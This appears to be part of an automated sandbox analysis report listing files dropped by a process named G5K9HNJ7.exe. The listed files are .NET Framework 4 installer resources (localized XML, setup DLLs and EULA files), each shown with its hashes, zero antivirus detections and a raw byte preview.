                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".T.h.e. .s.e.t.u.p. .c.a.n.n.o.t. .r.u.n. .i.n. .c.o.m.p.a.t.i.b.i.l.i.t.y. .m.o.d.e... .F.o.r. .m.o.r.e. .i.n.f.o.r.m.a.t.i.o.n.,. .s.e.e. .t.h.e. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.R.e.a.d.m.e. .f.i.l.e.&.l.t.;./.A.&.g.t.;...". ./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.

                                                            C:\6c8944922f7b98d0b6cd82b768\1033\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):17240
                                                            Entropy (8bit):5.151474565875158
                                                            Encrypted:false
                                                            SSDEEP:192:byk5nUfwTW7JwWp0eW6jp8M+9HS8bC/TJs7kFkzQKPnEtObMacxc8hjeyveCXZBe:pgoTWp0eWB9ygC/TfFkzLXci2jpv8
                                                            MD5:9547D24AC04B4D0D1DBF84F74F54FAF7
                                                            SHA1:71AF6001C931C3DE7C98DDC337D89AB133FE48BB
                                                            SHA-256:36D0159ED1A7D88000737E920375868765C0A1DD6F5A5ACBB79CF7D97D9E7A34
                                                            SHA-512:8B6048F4185A711567679E2DE4789407077CE5BFE72102D3CB1F23051B8D3E6BFD5886C801D85B4E62F467DD12DA1C79026A4BC20B17F54C693B2F24E499D40F
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........(...............................................P......<f....@.......................................... ...%...........,..X............................................................................................text...G...........................@..@.rsrc....%... ...&..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1033\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):3188
                                                            Entropy (8bit):5.285087573798006
                                                            Encrypted:false
                                                            SSDEEP:96:MHfTLNnTkWBTkFDZ8f4wHlre7MUxprfKmMb0+MW+1Ep9qeelN+sznM+IEp+Lk2:yfyTLillHW+mMhyAspz2
                                                            MD5:B7129C4881F118FCB38F27CFB00CD36D
                                                            SHA1:148989B710205C6A67B3F960567F6DAA98D75BDA
                                                            SHA-256:DA3D6A6AC223744DF01C920EAE5F43E017F52350831C4F3F6BB38D78232EA3B4
                                                            SHA-512:C0816D7676DDF0774EB9022BD305CDCDFEF590BE38E20C2D5584968BCA78E10A14BE375FA892593F11D04BE2734A30B5C1D21814B88C31814C713E08546436E7
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\fswiss\fprq2\fcharset0 Tahoma;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;\red255\green0\blue0;\red0\green0\blue128;}..{\*\generator Msftedit 5.41.21.2508;}\viewkind4\uc1\pard\sb120\sa120\f0\fs20\par..\b\f1\fs28 MICROSOFT SOFTWARE SUPPLEMENTAL LICENSE TERMS\par..\fs22 MICROSOFT .NET FRAMEWORK 4 FOR MICROSOFT WINDOWS OPERATING SYSTEM \f0\par..\f1 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE FOR MICROSOFT WINDOWS OPERATING SYSTEM \f0\par..\pard\brdrb\brdrs\brdrw10\brsp20 \sb120\sa120\f1 AND ASSOCIATED LANGUAGE PACKS\b0\f0\par..\pard\sb120\sa120\f1\fs20 Microsoft Corporation (or based on where you live, one of its affiliates) licenses this supplement to you. If you are licensed to use Microsoft Windows operating system software (for which this supplement is applicable) (the \ldblquote software\rdblquote ), you may use this supplement. You may

                                                            C:\6c8944922f7b98d0b6cd82b768\1035\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (597), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):77022
                                                            Entropy (8bit):3.5745326569682434
                                                            Encrypted:false
                                                            SSDEEP:1536:wT42CX8ugmmuM92kEMeeGOCOUJPePJiWGICG+JND:wT42CX8ugmmuM92kEMeeGOCOUJPePJi/
                                                            MD5:1AA252256C895B806E4E55F3EA8D5FFB
                                                            SHA1:0322EE94C3D5EA26418A2FEA3F7E62EC5D04B81D
                                                            SHA-256:8A68B3B6522C30502202ECB8D16AE160856947254461AC845B39451A3F2DB35F
                                                            SHA-512:CE57784892C0BE55A00CED0ADC594A534D8A40819790CA483A29B6CD544C7A75AE4E9BDE9B6DC6DE489CECEB7883B7C2EA0E98A38FCC96D511157D61C8AA3E63
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".A.s.e.n.n.u.s.o.h.j.e.l.m.a.a. .e.i. .v.o.i. .s.u.o.r.i.t.t.a.a. .y.h.t.e.e.n.s.o.p.i.v.u.u.s.t.i.l.a.s.s.a... .L.i.s...t.i.e.t.o.j.a. .o.n. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.L.u.e. .m.i.n.u.t. .-.t.i.e.d.o.s.t.o.s.s.a.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.

                                                            C:\6c8944922f7b98d0b6cd82b768\1035\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18264
                                                            Entropy (8bit):5.166182954405893
                                                            Encrypted:false
                                                            SSDEEP:192:rJkinUfwVWVRdufl0fXA1Z1j93S0WHpdcIirs442QXWMkeWEQKPnEtObMacxc8hg:rO16Lwz51JWMkeWELXci2jpvi
                                                            MD5:881ADF55D51976CA592033A7ADF620B8
                                                            SHA1:E82ED85E25411610D1F977A99368A7A6547C7C47
                                                            SHA-256:88FCE9BFC0458E375811A7F1EA7CB9777E241D373EEF15D4B23835F77979D54C
                                                            SHA-512:FED744A6E37F18B6CC3708EEB9F3E874269B1CBDB63B54284470E39E2B01D3DFB61F3626E34638231B9034FA699BDCCD7FE623D8478B205723EF45C1AA595FF9
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......(.....@.......................................... ..x)...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1035\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):3702
                                                            Entropy (8bit):5.238529406475761
                                                            Encrypted:false
                                                            SSDEEP:96:MWBfuMAh8TZhqTy9DbDixX7zR7MrrqX37ILY7TpLgoyk1zERRe5g9KIMpDnYA06m:VfeRzH3vmLQzE6AOAC2
                                                            MD5:4A43D21D1576E040DC9F5B90162A0401
                                                            SHA1:1616FA39D9E4E7B2BB927CADED944DD14BD05656
                                                            SHA-256:F0E2739892A1CE8A6445CEC72FF9AD88E939E21C719552E8ACD746F92F9FAFB7
                                                            SHA-512:7A7C50B7EC09282A828B06C6A52340C1CAEFF0CFA01FF81375483045972D3645092B5B385103C19ACCADBE5B758DFF85A9DC6FDC00F9AF32AEE076E2C49F79BA
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1041{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1035\b\f0\fs20 MICROSOFT-OHJELMISTON T\'c4YDENNYSOSAN K\'c4YTT\'d6OIKEUSSOPIMUKSEN EHDOT\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\lang1035\f0 MICROSOFT .NET FRAMEWORK 4 MICROSOFT WINDOWS -K\'c4YTT\'d6J\'c4RJESTELM\'c4\'c4N\lang1033\f1\par..\lang1035\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE MICROSOFT WINDOWS -K\'c4YTT\'d6J\'c4RJESTELM\'c4\'c4N\par..\lang1033 SEK\'c4 NIIHIN LIITTYV\'c4T KIELIPAKETIT\par..\pard\nowidctlpar\sb120\sa120\lang1035\b0 Microsoft Corporation (tai asiakkaan asuinpaikan mukaan m\'e4\'e4r\'e4ytyv\'e4 Microsoft Corporationin konserniyhti\'f6) my\'f6nt\'e4\'e4 asiakkaalle t\'e4m\'e4n t\'e4ydennysosan k\'e4ytt\'f6oikeudet.\la

                                                            C:\6c8944922f7b98d0b6cd82b768\1036\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (666), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):82962
                                                            Entropy (8bit):3.5891850903091727
                                                            Encrypted:false
                                                            SSDEEP:384:4wCFpNvOvt1jagJVzRzchryjiTIJz0kbG52bxVv:WvotpaluaIJzaIv
                                                            MD5:1DAD88FAED661DB34EEF535D36563EE2
                                                            SHA1:0525B2F97EDDBD26325FDDC561BF8A0CDA3B0497
                                                            SHA-256:9605468D426BCBBE00165339D84804E5EB2547BFE437D640320B7BFEF0B399B6
                                                            SHA-512:CCD0BFFBF0538152CCCD4B081C15079716A5FF9AD04CEE8679B7F721441F89EB7C6F8004CFF7E1DDE9188F5201F573000D0C078474EDF124CFA4C619E692D6BC
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".L.e. .p.r.o.g.r.a.m.m.e. .d.'.i.n.s.t.a.l.l.a.t.i.o.n. .n.e. .p.e.u.t. .p.a.s. .s.'.e.x...c.u.t.e.r. .e.n. .m.o.d.e. .d.e. .c.o.m.p.a.t.i.b.i.l.i.t..... .P.o.u.r. .p.l.u.s. .d.'.i.n.f.o.r.m.a.t.i.o.n.s.,. .c.o.n.s.u.l.t.e.z. .l.e. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.f.i.c.h.i.e.r. .r.e.a.d.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.

                                                            C:\6c8944922f7b98d0b6cd82b768\1036\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18776
                                                            Entropy (8bit):5.112489568342605
                                                            Encrypted:false
                                                            SSDEEP:384:J7Z66AY9li3OoDDkbiWpQeWELXci2jpv8:JffiZDgycMi2jpv8
                                                            MD5:93F57216FE49E7E2A75844EDFCCC2E09
                                                            SHA1:DCCD52787F147E9581D303A444C8EE134AFC61A8
                                                            SHA-256:2506827219B461B7C6C862DAE29C8BFF8CB7F4A6C28D2FF60724CAC70903987D
                                                            SHA-512:EADFFB534C5447C24B50C7DEFA5902F9EB2DCC4CF9AF8F43FA889B3367EA25DFA6EA87FF89C59F1B7BBF7106888F05C7134718021B44337AE5B7D1F808303BB1
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................P......B|....@.......................................... ...+...........2..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1036\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):3526
                                                            Entropy (8bit):5.107243175407303
                                                            Encrypted:false
                                                            SSDEEP:96:MTBfEhmvTf8vTR/DSIem21HDpHD1cT+Tot4er42xzK8/ptMpDLaFNsNGlDPsCU2:IfJw95eJlx1E+Tot4er42xzKuOKPU2
                                                            MD5:E0DA85DB8B02A89A63601EA6B9AD7FF8
                                                            SHA1:5F91C397CF3FBF4475FF71339B2D69C45694130F
                                                            SHA-256:8880B979A4F8ECDD529241D9AE02583FECD21010EA1E255A1CBCD0C6FB2F75E9
                                                            SHA-512:C8F47154145507C89D9B599D725C3444A206AE2AFAC2ACA4B2EA18980DEC134A25FC539CE1FB2291AF942DC1CA25EE2FFF323FB17F43F5BF91157A30B19BCD17
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1036\b\f0\fs20 TERMES DE CONTRAT DE LICENCE D\rquote UN SUPPL\'c9MENT MICROSOFT\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0 MICROSOFT .NET FRAMEWORK\~4 POUR LE SYST\'c8ME D\rquote EXPLOITATION MICROSOFT WINDOWS\f1\par..\f0 MICROSOFT .NET FRAMEWORK\~4 CLIENT PROFILE POUR LE SYST\'c8ME D\rquote EXPLOITATION MICROSOFT WINDOWS\par..ET LES LANGAGE PACKS ASSOCI\'c9S\par..\pard\nowidctlpar\sb120\sa120\b0 Microsoft Corporation (ou, en fonction du lieu o\'f9 vous vivez, l\rquote un de ses affili\'e9s) vous accorde une licence pour ce suppl\'e9ment.\b \b0 Si vous \'eates titulaire d\rquote une licence d\rquote utilisation du logiciel de syst\'e8me d\rquote exploita

                                                            C:\6c8944922f7b98d0b6cd82b768\1037\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (599), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):72076
                                                            Entropy (8bit):4.190903034087703
                                                            Encrypted:false
                                                            SSDEEP:384:4wkvJlqaYsxaAzdNhXdQGKbvvGu1kZJNvSX33qLv:OHqaBxaeJN7T
                                                            MD5:16E6416756C1829238EF1814EBF48AD6
                                                            SHA1:C9236906317B3D806F419B7A98598DD21E27AD64
                                                            SHA-256:C0EE256567EA26BBD646F019A1D12F3ECED20B992718976514AFA757ADF15DEA
                                                            SHA-512:AA595ED0B3B1DB280F94B29FA0CB9DB25441A1EF54355ABF760B6B837E8CE8E035537738E666D27DD2A8D295D7517C325A5684E16304887CCB17313CA4290CE6
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."............... ............. ....... ............. ........... ......... ............... ........... ......... .........,. ....... .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;......... .R.e.a.d.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.

                                                            C:\6c8944922f7b98d0b6cd82b768\1037\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):16728
                                                            Entropy (8bit):5.741920618836553
                                                            Encrypted:false
                                                            SSDEEP:192:KADkdHUfwVW13jowXiTeISvjpHawC1wWmeW8QKPnEtObMacxc8hjeyveCX1HQ:K506Qrw5wWmeW8LXci2jpvfw
                                                            MD5:06CC83E6C677DB13757DF4242F5679F7
                                                            SHA1:493D44DA1C36A5CEC83B0420BEBC2BF76A9262E8
                                                            SHA-256:8E3C9332AB38DAD95A4293C466EAB88B17DEE82C87BE047839E85BB816B6146E
                                                            SHA-512:D4E1694AFE2A35A7A2DB3C8B2A4F83A536DE0AFC5871AE44591317B5B6489B3911F7AEDE8AD9584DCB0BAA8D84B65A20393D587D6F993035FA7DFE13AEAF10CF
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........&...............................................P............@.......................................... ..."...........*..X............................................................................................text...G...........................@..@.rsrc....0... ...$..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1037\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1255, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):6851
                                                            Entropy (8bit):4.46966326918659
                                                            Encrypted:false
                                                            SSDEEP:96:2Rf64JJR1vTJ3R1vTJZZDg1YGZmF1plypIuw75TYgnMJ9nqIQ2fPMpicPtxScRtZ:0fXRskPWIHxYnJVPOxScl9ZnlfZ4LH2
                                                            MD5:74C015D4E8024F9A49CF8D183CBDB0F5
                                                            SHA1:8428260A9E522A712EFC8740AF848BD7521DEB8E
                                                            SHA-256:D7718CF8F97F78656AA8964721757EA7E369FC7BBB052777C90E63D07C7CC7C5
                                                            SHA-512:BB8748054F194450BC0383D4E88600F00E01BA8FD182C3C3A5A09CFBB0C2FBC30B9CECBAD0B99DDA1EEFA5C3EB56AD50CCACF3FE39302842F16A17082F5F8D04
                                                            Malicious:false
                                                            Preview:{\rtf1\fbidis\ansi\ansicpg1255\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset177 Tahoma;}{\f1\fswiss\fprq2\fcharset0 Tahoma;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\froman\fprq2\fcharset177 Times New Roman;}}..{\colortbl ;\red0\green0\blue0;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\rtlpar\nowidctlpar\sb120\sa120\qr\lang1037\b\f0\rtlch\fs20\'fa\'f0\'e0\'e9 \'f8\'f9\'e9\'e5\'ef \'ee\'f9\'ec\'e9\'ee\'e9\'ed \'f2\'e1\'e5\'f8 \'fa\'e5\'eb\'f0\'fa \lang1033\f1\ltrch MICROSOFT\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \rtlpar\nowidctlpar\sb120\sa120\qr\f1 MICROSOFT .NET FRAMEWORK 4\lang1037\f0\rtlch \'f2\'e1\'e5\'f8 \'ee\'f2\'f8\'eb\'fa \'e4\'e4\'f4\'f2\'ec\'e4 \lang1033\f1\ltrch MICROSOFT WINDOWS\par..\lang1037\f0\rtlch\'f4\'f8\'e5\'f4\'e9\'ec \'ec\'f7\'e5\'e7 \'f9\'ec \lang1033\f1\ltrch MICROSOFT .NET FRAMEWORK 4\lang1037\f0\rtlch \'f2\'e1\'e5\'f8 \'ee\'f2\'f8\'eb\'fa \'e4\'e4\'f4\'f2\'ec\'e4 \lang1033\f1\ltrch MICROSOFT

                                                            C:\6c8944922f7b98d0b6cd82b768\1038\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (723), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):86442
                                                            Entropy (8bit):3.674300926924721
                                                            Encrypted:false
                                                            SSDEEP:1536:Ji+5JLuNF70SNjPBzuXrXdJHbdi3kC4kL1:Ji+5JLyF70SNjPBzuXrXdJHbdi3kCZZ
                                                            MD5:89D4356E0F226E75CA71D48690E8EC15
                                                            SHA1:2336CAA971527977F47512BC74E88CEC3F770C7D
                                                            SHA-256:FCBB619DEB2D57B791A78954B0342DBB2FEF7DDD711066A0786C8EF669D2B385
                                                            SHA-512:FA03D55A4AAFE94CBF5C134A65BD809FC86C042BC1B8FFBC9A2A5412EB70A468551C05C44B6CE81F638DF43CCA599AA1DD6F42F2DF3012C8A95A3612DF7C821E
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".A. .t.e.l.e.p...t.Q. .n.e.m. .f.u.t.t.a.t.h.a.t... .k.o.m.p.a.t.i.b.i.l.i.s. ...z.e.m.m...d.b.a.n... .T.o.v...b.b.i. .i.n.f.o.r.m...c.i... .a. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.F.o.n.t.o.s. .f...j.l.b.a.n.&.l.t.;./.A.&.g.t.;. .o.l.v.a.s.h.a.t....."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.

                                                            C:\6c8944922f7b98d0b6cd82b768\1038\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18776
                                                            Entropy (8bit):5.210200964255437
                                                            Encrypted:false
                                                            SSDEEP:384:mTW68sRjOP2w99bfc/ta4V3mfCHpeEVn3i0MC4wWqyWpLXci2jpv5nNY:m+Aj0R99bfKtHVWfCJeEVn3i0MC44pMQ
                                                            MD5:C1BF3D63576D619B24837B72986DFAD4
                                                            SHA1:7392C7B478090831EB2E213BF1224E4F16FDD4D8
                                                            SHA-256:0995DD70D260673F954DE54FDBA53D55218C536034BE6342E135C7D514073869
                                                            SHA-512:597F327DF59B0F0CF39FC8753154E55CA8053F489F3FAA5A59C3E7F2115148FE4B49313A94C7CE802AF4B9A1D3FDDF92D3EDC60246E68B17F4CA57CFA3B33397
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................P.......(....@.......................................... ..4+...........2..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1038\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1250, default language ID 1038
                                                            Category:dropped
